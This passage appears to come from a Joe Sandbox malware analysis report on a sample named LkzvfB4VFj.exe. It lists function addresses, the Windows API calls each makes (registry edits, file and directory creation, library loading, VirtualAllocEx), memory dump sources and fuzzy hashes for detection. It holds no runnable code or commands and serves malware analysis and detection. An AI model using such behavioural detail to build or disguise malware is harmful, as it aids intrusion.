                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                  • Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
                                                  • Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                  • Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C
                                                  Function 00402588 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025BA
                                                  • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025CD
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsi9279.tmp,00000000,00000011,00000002), ref: 004025E5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Enum$CloseValue
                                                  • String ID:
                                                  • API String ID: 397863658-0
                                                  • Opcode ID: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
                                                  • Instruction ID: ee0fd62ac357f9525b55a30647733f0e3798e9bebba0400de635a53faed38b57
                                                  • Opcode Fuzzy Hash: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
                                                  • Instruction Fuzzy Hash: 22017C71604204FFE7219F549E99ABF7ABCEF40358F20403EF505A61C0DAB88A459629
                                                  Function 00402516 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402546
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsi9279.tmp,00000000,00000011,00000002), ref: 004025E5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID:
                                                  • API String ID: 3356406503-0
                                                  • Opcode ID: 6213eafd8b46f955f614869397e07eb9b1fadeed980eca135cc1a2a492507a25
                                                  • Instruction ID: 101e8c123746c764c526cee79e76b60048690b918ccacca24166b7bb3c1ff757
                                                  • Opcode Fuzzy Hash: 6213eafd8b46f955f614869397e07eb9b1fadeed980eca135cc1a2a492507a25
                                                  • Instruction Fuzzy Hash: EA11C171A00205EFDF25DF64CE985AE7AB4EF00355F20843FE446B72C0D6B88A86DB19
                                                  Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                  • Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
                                                  • Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                  • Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D
                                                  Function 00402421 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402442
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040244B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CloseDeleteValue
                                                  • String ID:
                                                  • API String ID: 2831762973-0
                                                  • Opcode ID: 07b32314aa9a422e600aa3f6776080c68f979d551996adedd097d7eb0a26439f
                                                  • Instruction ID: 28034f9d49707e31730e5ee4ae5769526bd8744af0d0927f07882998c216e066
                                                  • Opcode Fuzzy Hash: 07b32314aa9a422e600aa3f6776080c68f979d551996adedd097d7eb0a26439f
                                                  • Instruction Fuzzy Hash: E3F09632600121DBE720BFA49B8EAAE72A59B40314F25453FF602B71C1D9F84E4246AE
                                                  Function 00401A1E Relevance: 3.0, APIs: 2, Instructions: 30stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A31
                                                  • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentExpandStringslstrcmp
                                                  • String ID:
                                                  • API String ID: 1938659011-0
                                                  • Opcode ID: ce4306d2a07f27be9225dd95e0d9a06ea23b17b85f17c9412fffb0a9b71968b5
                                                  • Instruction ID: c1865f8cc46f1228928c2992524d711605dd36016a3aefe194dc66e9efe750da
                                                  • Opcode Fuzzy Hash: ce4306d2a07f27be9225dd95e0d9a06ea23b17b85f17c9412fffb0a9b71968b5
                                                  • Instruction Fuzzy Hash: 24F08231705201DBCB20DF769D04A9BBFA4EF91354B10803BE145F6190D6788502CA68
                                                  Function 00401EC5 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401EE3
                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401EEE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Window$EnableShow
                                                  • String ID:
                                                  • API String ID: 1136574915-0
                                                  • Opcode ID: 8b7817ca22b79e9cee4aa1cb1be03623fa11f3862aed9c5f3b00cb70b3c6cfe0
                                                  • Instruction ID: 2686c2d45ba130581374544c13beebfcaf73fd10f5aa92b185336ae358fe78f7
                                                  • Opcode Fuzzy Hash: 8b7817ca22b79e9cee4aa1cb1be03623fa11f3862aed9c5f3b00cb70b3c6cfe0
                                                  • Instruction Fuzzy Hash: 69E09232B04200EFD714EFA5EA8856E7BB0EB40325B20413FF001F20C1DAB848418A69
                                                  Function 00406500 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                    • Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                    • Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
                                                    • Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                  • Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
                                                  • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                  • Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D
                                                  Function 00405C90 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\LkzvfB4VFj.exe,80000000,00000003), ref: 00405C94
                                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                  • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                  • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                  • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                  Function 00405761 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
                                                  • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                  • Instruction ID: 5acf30d11c51c39224c83c09ee2e5989404a14e094893e30e7ab7d3df00569a4
                                                  • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                  • Instruction Fuzzy Hash: 21C04C31244505EFD6105B30AE08F177A90AB50741F1644396186E10B0EA388455E96D
                                                  Function 6FEB2A38 Relevance: 1.6, APIs: 1, Instructions: 143memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(00000000), ref: 6FEB2AF7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92789234716.000000006FEB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FEB0000, based on PE: true
                                                  • Associated: 00000000.00000002.92789161524.000000006FEB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.92789295698.000000006FEB3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.92789366643.000000006FEB5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6feb0000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: b484f0552789ab6faf5cbfc55fb5d8f5f15e511610e26b03c69526561770ffcf
                                                  • Instruction ID: 7e5a3b6b352edc32424b8baa7c4f8f7e8dc25c9675b961b0fc772966150dc576
                                                  • Opcode Fuzzy Hash: b484f0552789ab6faf5cbfc55fb5d8f5f15e511610e26b03c69526561770ffcf
                                                  • Instruction Fuzzy Hash: A7415072504705DFDF129FA4DB84B593F75FF26328F30442EE508DA2A0DB34A8518B92
                                                  Function 0040266D Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: wsprintf
                                                  • String ID:
                                                  • API String ID: 2111968516-0
                                                  • Opcode ID: 367ecb1198001a867d8e3b7756d3c175cfd735077116dd6966e3788219f0b2a9
                                                  • Instruction ID: 7f5a5d1368c13d317d2e99ee4d98356b480ceadea176dd08c5889da6900fd1c4
                                                  • Opcode Fuzzy Hash: 367ecb1198001a867d8e3b7756d3c175cfd735077116dd6966e3788219f0b2a9
                                                  • Instruction Fuzzy Hash: 7E21B730D04299FADF328BA885886AEBB749F11314F1440BFE491B73D1C2BD8A85DB19
                                                  Function 0040166A Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 00401685
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: FileMove
                                                  • String ID:
                                                  • API String ID: 3562171763-0
                                                  • Opcode ID: 1edc5c0a003d732ce3bee6573eefb30b8b2fa69015ea7de72e37931521f2516e
                                                  • Instruction ID: c16fe538d576f0a812f108a5c598968f2bbae53de2c44bc87e09c6d73b5458c5
                                                  • Opcode Fuzzy Hash: 1edc5c0a003d732ce3bee6573eefb30b8b2fa69015ea7de72e37931521f2516e
                                                  • Instruction Fuzzy Hash: EEF01D3160852496DB20ABA54E49E5F3264DB42769B24033BF422B21D1EABC8542956E
                                                  Function 0040272B Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402749
                                                    • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: FilePointerwsprintf
                                                  • String ID:
                                                  • API String ID: 327478801-0
                                                  • Opcode ID: 6490c60e78b8e72c9ff7044d1ebd2fda03870678213011db9787ff048aa9e55a
                                                  • Instruction ID: d2cb0ca5e863be2ef59b536234997f243a65a7806d73518010ac019a9530af38
                                                  • Opcode Fuzzy Hash: 6490c60e78b8e72c9ff7044d1ebd2fda03870678213011db9787ff048aa9e55a
                                                  • Instruction Fuzzy Hash: 7EE09271B00114EED711FBA4AE49DBF77B8EB40315B10403BF102F10C1CABC49128A2E
                                                  Function 0040239C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004023D5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringWrite
                                                  • String ID:
                                                  • API String ID: 390214022-0
                                                  • Opcode ID: cd8b371b6f55f1d33d0eddf2f35f8062392e7128ea2648a4caa2e71cbd90ff81
                                                  • Instruction ID: a2264a5e3b04165b7de03e79847980bb6a424129cbe2f78830b73284cd35be0b
                                                  • Opcode Fuzzy Hash: cd8b371b6f55f1d33d0eddf2f35f8062392e7128ea2648a4caa2e71cbd90ff81
                                                  • Instruction Fuzzy Hash: F8E04831610114ABD7203EB14F8D97F31A9DB44304B34153FBA11761C6D9FC5C414279
